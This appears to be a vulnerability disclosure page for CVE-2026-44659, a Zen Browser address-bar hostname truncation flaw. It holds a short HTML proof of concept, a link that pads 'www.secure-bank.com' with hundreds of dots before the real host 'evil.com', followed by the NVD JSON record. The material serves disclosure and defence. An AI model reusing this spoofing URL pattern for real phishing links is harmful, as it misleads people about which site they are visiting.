CVE-2026-44659

<!-- PoC demonstration of the hostname truncation vulnerability --> <!-- This HTML file creates a link to a simulated malicious domain --> <!DOCTYPE html> <html> <head> <title>Zen Browser Hostname Truncation PoC</title> </head> <body> <h1>Zen Browser CVE-2026-44659 PoC</h1> <p>This page demonstrates how a long hostname can be truncated in the address bar.</p> <!-- The link below uses a long subdomain to push the real domain out of view. Replace 'evil.com' with an actual domain for testing. --> <a href="http://www.secure-bank.com................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................evil.com"> Click here to visit the spoofed bank site </a> <p>In a vulnerable version of Zen Browser (< 1.19.12b), the address bar will show only 'www.secure-bank.com', hiding the actual origin.</p> </body> </html>

{"cve": {"id": "CVE-2026-44659", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:38.380", "lastModified": "2026-05-11T18:16:38.380", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zen is a firefox-based browser. Prior to 1.19.12b, the ZEN Browser incorrectly truncates long hostnames in the address bar and shows only the attacker-controlled prefix of the subdomain, hiding the actual registrable domain (eTLD+1). As a result, an attacker can craft extremely long malicious subdomains that visually imitate trusted brands, and the browser will display only the spoofed prefix, misleading users about the actual origin of the site. This directly compromises the URL bar as a security indicator and creates a phishing/supply-chain attack vector. This vulnerability is fixed in 1.19.12b."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-451"}]}], "references": [{"url": "https://github.com/zen-browser/desktop/security/advisories/GHSA-7p2r-fp29-9w69", "source": "[email protected]"}]}}